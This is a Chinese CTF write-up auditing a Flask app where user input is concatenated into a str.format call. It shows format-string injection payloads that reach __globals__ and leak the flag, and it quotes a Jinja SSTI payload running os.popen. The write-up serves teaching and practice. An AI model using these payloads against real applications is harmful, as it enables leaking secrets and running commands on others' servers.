代码审计
from flask import Flask, render_template, request
from flag import flag, FLAG
import datetime
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def index():
f = open("app.py", "r")
ctx = f.read()
f.close()
f1ag = request.args.get('f1ag') or ""
exp = request.args.get('exp') or ""
flAg = FLAG(f1ag)
message = "Your flag is {0}" + exp
if exp == "":
return ctx
else:
return message.format(flAg)
if __name__ == "__main__":
app.run()主要看最后,
message = "Your flag is {0}" + exp
return message.format(flAg)这两句话是我们解题的关键,这题考的考点就是format函数吧,我们首先了解一下format(flAg) 是一个字符串方法,用于将字符串中的占位符 {} 替换为 flAg 变量的值。例如:
python
name = "world"
message = "Hello, {}!".format(name)
print(message) # 输出:Hello, world!理解之后我们看下题目的话的意思就是
message = "Your flag is flAg" + exp但是我们不知道FLAG函数是什么,然后看到本题是flask框架,所有尝试ssti,也像ssti,如果我们了解这个知识的话就很好做了
那我们只需要让exp带0就好了,但是这里和ssti不同的就是单括号
{0.__class__}页面上没有回显,回显在源码里面
Your flag is
{0.__class__.__bases__[0]}
Your flag is
但是你妹的{0.__class__.__bases__[0]__subclasses__()}没东西
把括号去掉{0.__class__.__bases__[0]__subclasses__}
Your flag is
也没有利用的空间啊,lipsum肯定是不行的,因为必须有0
还要一种{{config.__class__.__init__.__globals__['os'].popen('dir').read()}}
当输入{0.__class__.__init__.__globals__}flag就出现了,但是
按照以前的不可以执行命令,我们思考一下为什么
我们上面payload执行命令的本质是config里面有os,但是我们这里的里面是没有这些东西的,global我们可以看到里面的全局变量,所有看到了flag